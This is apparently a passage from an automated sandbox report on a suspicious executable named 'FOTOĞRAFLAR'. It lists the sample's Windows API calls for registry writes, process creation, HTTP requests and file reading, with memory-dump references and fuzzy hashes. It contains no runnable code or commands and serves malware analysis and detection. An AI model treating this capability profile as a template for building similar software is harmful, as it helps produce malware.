                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00D8FDB1
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00D8FDBC
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00D8FDC7
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00D8FDD2
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00D8FDDD
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00D8FDE8
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00D8FDF3
                                                                      • GetCursorInfo.USER32(?), ref: 00D8FE03
                                                                      • GetLastError.KERNEL32 ref: 00D8FE45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                      • String ID:
                                                                      • API String ID: 3215588206-0
                                                                      • Opcode ID: d1175ea68660d18e1e020f842e7750d65a370a1018d2eea656057968977511eb
                                                                      • Instruction ID: 811552787cb4ae255076961793874ddfff6b712a427bb2848f6bcd06ecbd4822
                                                                      • Opcode Fuzzy Hash: d1175ea68660d18e1e020f842e7750d65a370a1018d2eea656057968977511eb
                                                                      • Instruction Fuzzy Hash: 164154B0D083196ADB10DFBA8C8985EBFE8FF04754B54452AF11CE7291DB789901CFA0
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9C3E4
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DAD0D0,00000000,?,00000000,?,?), ref: 00D9C46B
                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00D9C4CB
                                                                      • _wcslen.LIBCMT ref: 00D9C51B
                                                                      • _wcslen.LIBCMT ref: 00D9C596
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00D9C5D9
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00D9C6E8
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00D9C887
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Value$_wcslen$CloseConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3165515054-966354055
                                                                      • Opcode ID: 24aaf4611d8521cf440daaee4e92117494062d56b23d62835752d3216f87033a
                                                                      • Instruction ID: ba0593b0cab665eddea83a2925a2912242779901647237d31bdcd7b441d5438a
                                                                      • Opcode Fuzzy Hash: 24aaf4611d8521cf440daaee4e92117494062d56b23d62835752d3216f87033a
                                                                      • Instruction Fuzzy Hash: 4C127C35614201AFDB14DF14C491B6AB7E5EF88714F18849DF94A9B3A2CB31FD41CBA1
                                                                      APIs
                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D30046
                                                                        • Part of subcall function 00D3006D: InitializeCriticalSectionAndSpinCount.KERNEL32(00DE070C,00000FA0,CECF3534,?,?,?,?,00D52353,000000FF), ref: 00D3009C
                                                                        • Part of subcall function 00D3006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D52353,000000FF), ref: 00D300A7
                                                                        • Part of subcall function 00D3006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D52353,000000FF), ref: 00D300B8
                                                                        • Part of subcall function 00D3006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D300CE
                                                                        • Part of subcall function 00D3006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D300DC
                                                                        • Part of subcall function 00D3006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D300EA
                                                                        • Part of subcall function 00D3006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D30115
                                                                        • Part of subcall function 00D3006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D30120
                                                                      • ___scrt_fastfail.LIBCMT ref: 00D30067
                                                                        • Part of subcall function 00D30023: __onexit.LIBCMT ref: 00D30029
                                                                      Strings
                                                                      • WakeAllConditionVariable, xrefs: 00D300E2
                                                                      • SleepConditionVariableCS, xrefs: 00D300D4
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D300A2
                                                                      • kernel32.dll, xrefs: 00D300B3
                                                                      • InitializeConditionVariable, xrefs: 00D300C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 66158676-1714406822
                                                                      • Opcode ID: 70e260fee5d879ec1bf4490eec4bf5ef3a76a688999518f9bbda98093582032c
                                                                      • Instruction ID: 26e2b7a7cac325de9782548e185c8b50dc2e866213e29a97a2a1e85a8b5ba695
                                                                      • Opcode Fuzzy Hash: 70e260fee5d879ec1bf4490eec4bf5ef3a76a688999518f9bbda98093582032c
                                                                      • Instruction Fuzzy Hash: CC210532A44711AFDB216BF4AC56B693FE8EB06FA1F040536F805DB390DBB49C448A70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: a09e0a56a3420e25ade2397a68c5c670df3e89cbb7c1e8f8397788a4930fb7e9
                                                                      • Instruction ID: 512c6577095aec5dbf10b4f8e1a2cffd61ec26036f55b3b06315144e8393dbbc
                                                                      • Opcode Fuzzy Hash: a09e0a56a3420e25ade2397a68c5c670df3e89cbb7c1e8f8397788a4930fb7e9
                                                                      • Instruction Fuzzy Hash: 87E1A732A00616ABCB189FB8D4416EDBB75FF14710F59C11AE45AB7240FF30AE85A7B0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: d2ed1a46ae936b1df7f5a433cac51af06c898cb3eafbc706720643cd57fc6ea6
                                                                      • Instruction ID: 9b32ed376b78593b52954e96f92939020953cb01c0bb235cb55a25e61c6b2df3
                                                                      • Opcode Fuzzy Hash: d2ed1a46ae936b1df7f5a433cac51af06c898cb3eafbc706720643cd57fc6ea6
                                                                      • Instruction Fuzzy Hash: C0B1B2315083029FC710EF28D891AAEB7E5EF95720F54491DF59587295EB30D885CBB2
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00D9B0BF
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D9B0D7
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D9B0FB
                                                                      • _wcslen.LIBCMT ref: 00D9B127
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D9B13B
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D9B15D
                                                                      • _wcslen.LIBCMT ref: 00D9B259
                                                                        • Part of subcall function 00D804C5: GetStdHandle.KERNEL32(000000F6), ref: 00D804E4
                                                                      • _wcslen.LIBCMT ref: 00D9B272
                                                                      • _wcslen.LIBCMT ref: 00D9B28D
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D9B2DD
                                                                      • GetLastError.KERNEL32(00000000), ref: 00D9B32E
                                                                      • CloseHandle.KERNEL32(?), ref: 00D9B360
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9B371
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9B383
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9B395
                                                                      • CloseHandle.KERNEL32(?), ref: 00D9B40A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 2178637699-0
                                                                      • Opcode ID: 5b0bec9d25475e2868e66c27db30f5cb20f173b17aa81e3fbe01ecf5d0a2eccd
                                                                      • Instruction ID: 91ce1b17b9d5c001045aeb2e5a600bdbe70f05eaea7becff38ee6922a69aca24
                                                                      • Opcode Fuzzy Hash: 5b0bec9d25475e2868e66c27db30f5cb20f173b17aa81e3fbe01ecf5d0a2eccd
                                                                      • Instruction Fuzzy Hash: 42F181315043409FCB14EF24E991B6ABBE5EF85324F19855EF8894B2A2DB31EC45CB72
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00DE1990), ref: 00D53B6F
                                                                      • GetMenuItemCount.USER32(00DE1990), ref: 00D53C1F
                                                                      • GetCursorPos.USER32(?), ref: 00D53C63
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D53C6C
                                                                      • TrackPopupMenuEx.USER32(00DE1990,00000000,?,00000000,00000000,00000000), ref: 00D53C7F
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D53C8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: ad2231462736f49fd5e467ae3d11c3ac3407004b967d2003d5f6ef72f514a82e
                                                                      • Instruction ID: 72763b8954aeb5e586ae846eb78a4c3369ad582a8d76d17cc5b0c356056debfe
                                                                      • Opcode Fuzzy Hash: ad2231462736f49fd5e467ae3d11c3ac3407004b967d2003d5f6ef72f514a82e
                                                                      • Instruction Fuzzy Hash: 4B712570641215BEEF218F64DC49FAABF65FF053A4F144206FD28A62E0C7B1A954CBB0
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00DA6CB9
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DA6D2D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DA6D4F
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA6D62
                                                                      • DestroyWindow.USER32(?), ref: 00DA6D83
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D10000,00000000), ref: 00DA6DB2
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA6DCB
                                                                      • GetDesktopWindow.USER32 ref: 00DA6DE4
                                                                      • GetWindowRect.USER32(00000000), ref: 00DA6DEB
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DA6E03
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DA6E1B
                                                                        • Part of subcall function 00D2ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D2ADD2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: 365c1c95cc636da99d02b6736cb285a17cc657ce77c2c2bd087fb85f415b29b6
                                                                      • Instruction ID: be0129e22cc1404e322164b905204417dd887dc27b6e1334fe62bb38ec0d9fe8
                                                                      • Opcode Fuzzy Hash: 365c1c95cc636da99d02b6736cb285a17cc657ce77c2c2bd087fb85f415b29b6
                                                                      • Instruction Fuzzy Hash: 5F714A74544345AFDB21DF28CC54BAABBFAFB8A314F48441EF99587261CB70E941CB22
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00DA9039
                                                                        • Part of subcall function 00DA7543: ClientToScreen.USER32(?,?), ref: 00DA7569
                                                                        • Part of subcall function 00DA7543: GetWindowRect.USER32(?,?), ref: 00DA75DF
                                                                        • Part of subcall function 00DA7543: PtInRect.USER32(?,?,00DA8A7B), ref: 00DA75EF
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DA90A2
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DA90AD
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DA90D0
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DA9117
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DA9130
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DA9147
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DA9169
                                                                      • DragFinish.SHELL32(?), ref: 00DA9170
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DA9263
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 9b02f51f2e25fd5eda5a0122fa1cef9e8280a8c6a75a4f05bb8864114dbaeb71
                                                                      • Instruction ID: 8d79e37fb447cdd6b5e91b540a64a275ee9998fad739901bbe7503cf75b2edf2
                                                                      • Opcode Fuzzy Hash: 9b02f51f2e25fd5eda5a0122fa1cef9e8280a8c6a75a4f05bb8864114dbaeb71
                                                                      • Instruction Fuzzy Hash: 1A618D71108301AFC710EF60DC95DAFBBE8EF89360F40091EF595962A1DB709A49CBB2
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D8C3CE
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D8C3E1
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D8C3F5
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D8C40E
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00D8C451
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D8C467
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D8C472
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D8C4A2
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D8C4FA
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D8C50E
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00D8C519
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: 2540d94e48a63e0919dcc7558d671021979e0702e08284f5f2f023404b8d68bb
                                                                      • Instruction ID: bf67f1b9fe1daec928e474646e0e17a4ea176fbd080fb42dd0beda8bd30e4e6f
                                                                      • Opcode Fuzzy Hash: 2540d94e48a63e0919dcc7558d671021979e0702e08284f5f2f023404b8d68bb
                                                                      • Instruction Fuzzy Hash: F25139B1520708FFEB21AF64C888ABA7BBCFF09754F04A41AF945D6250D734E9449B70
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00DA8484
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00DA8494
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00DA849F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DA84AC
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00DA84BA
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DA84C9
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00DA84D2
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DA84D9
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DA84EA
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DAFC54,?), ref: 00DA8503
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00DA8513
                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00DA8533
                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DA8563
                                                                      • DeleteObject.GDI32(00000000), ref: 00DA858B
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DA85A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: bda81b6bcb38df3632844e2e9abe7266506bc4df0a4f7c43d261bb9ff1c8c7d4
                                                                      • Instruction ID: 604bc16f9f30cc4bf003b0dc370c60b06a6a075676df315d2bd4f8bbb3900feb
                                                                      • Opcode Fuzzy Hash: bda81b6bcb38df3632844e2e9abe7266506bc4df0a4f7c43d261bb9ff1c8c7d4
                                                                      • Instruction Fuzzy Hash: 62412975600204AFDB119FA5CC88EAA7BB9FF8A721F148058FD05D7260DB749941DB70
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00D81420
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00D81429
                                                                      • VariantClear.OLEAUT32(?), ref: 00D81435
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00D81519
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00D81575
                                                                      • VariantInit.OLEAUT32(?), ref: 00D81626
                                                                      • SysFreeString.OLEAUT32(?), ref: 00D816AA
                                                                      • VariantClear.OLEAUT32(?), ref: 00D816F6
                                                                      • VariantClear.OLEAUT32(?), ref: 00D81705
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00D81741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: ff88b812e39e36506a703f857bb80fe1ef19c40394e638e24b4bb8bad3f7a95f
                                                                      • Instruction ID: f168fed801203b55e542f2adc8a130dd96222ff7eb5dbd957a97ead7959078e9
                                                                      • Opcode Fuzzy Hash: ff88b812e39e36506a703f857bb80fe1ef19c40394e638e24b4bb8bad3f7a95f
                                                                      • Instruction Fuzzy Hash: 21D10375A00215EBCB10AF69E845BBDB7B8FF05700F248459F499AB290DB70EC4ADB71
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D9C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9B5D5,?,?), ref: 00D9C8DC
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C918
                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C98F
